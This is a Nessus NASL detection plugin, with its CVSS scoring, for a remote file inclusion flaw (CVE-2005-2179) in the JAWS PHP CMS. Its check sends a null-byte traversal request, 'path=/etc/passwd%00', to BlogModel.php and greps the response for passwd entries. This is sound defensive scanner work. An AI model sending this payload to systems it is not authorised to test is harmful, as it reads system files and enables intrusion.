5 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:L/Au:N/C:N/I:P/A:N
0.006 Low
EPSS
Percentile
78.8%
The remote host is running JAWS, a content management system written in PHP.
The remote version of Jaws allows an attacker to include URLs remotely. This may allow for the execution of arbitrary code with the privileges of the web server.
#%NASL_MIN_LEVEL 70300
#
# This script was written by Josh Zlatin-Amishav
#
# GPLv2
#
# Fixed by Tenable:
# - added CVE xref
# - added See also and Solution.
# - fixed script family.
# - changed exploit and test of its success.
# - updated plugin title, enhanced description (1/8/2009)
include('deprecated_nasl_level.inc');
include('compat.inc');
if(description)
{
script_id(19395);
script_cve_id("CVE-2005-2179");
script_bugtraq_id(14158);
script_version("1.17");
script_name(english:"Jaws BlogModel.php path Parameter Remote File Inclusion");
script_set_attribute(attribute:"synopsis", value:
"Arbitrary code may be run on the remote host." );
script_set_attribute(attribute:"description", value:
"The remote host is running JAWS, a content management system written
in PHP.
The remote version of Jaws allows an attacker to include URLs
remotely. This may allow for the execution of arbitrary code
with the privileges of the web server." );
script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2005/Jul/58" );
script_set_attribute(attribute:"solution", value:
"Upgrade to JAWS version 0.5.3 or later." );
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N");
script_set_cvss_temporal_vector("CVSS2#E:H/RL:W/RC:ND");
script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"plugin_publication_date", value: "2005/08/08");
script_set_attribute(attribute:"vuln_publication_date", value: "2005/07/06");
script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/19");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_end_attributes();
summary["english"] = "Detect Jaws File Inclusion Vulnerability";
script_summary(english:summary["english"]);
script_category(ACT_GATHER_INFO);
script_copyright(english:"Copyright (C) 2005-2021 Josh Zlatin-Amishav");
family["english"] = "CGI abuses";
script_family(english:family["english"]);
script_dependencie("http_version.nasl");
script_require_ports("Services/www", 80);
script_exclude_keys("Settings/disable_cgi_scanning");
script_require_keys("www/PHP");
exit(0);
}
include("http_func.inc");
include("http_keepalive.inc");
port = get_http_port(default:80, embedded:TRUE);
if (! get_port_state(port) ) exit(0);
if (! can_host_php(port:port) ) exit(0);
foreach dir ( cgi_dirs() )
{
req = http_get(
item:string(
dir, "/gadgets/Blog/BlogModel.php?",
"path=/etc/passwd%00"
),
port:port
);
res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
if ( res == NULL ) exit(0);
if (
# we could read /etc/passwd.
egrep(string:res, pattern:"root:.*:0:[01]:") ||
# we got an error suggesting magic_quotes_gpc was enabled but
# remote URLs might still work.
egrep(string:res, pattern:"Warning: main\(/etc/passwd.+failed to open stream") ||
egrep(string:res, pattern:"Warning: .+ Failed opening '/etc/passwd.+for inclusion")
) {
security_warning(port);
exit(0);
}
}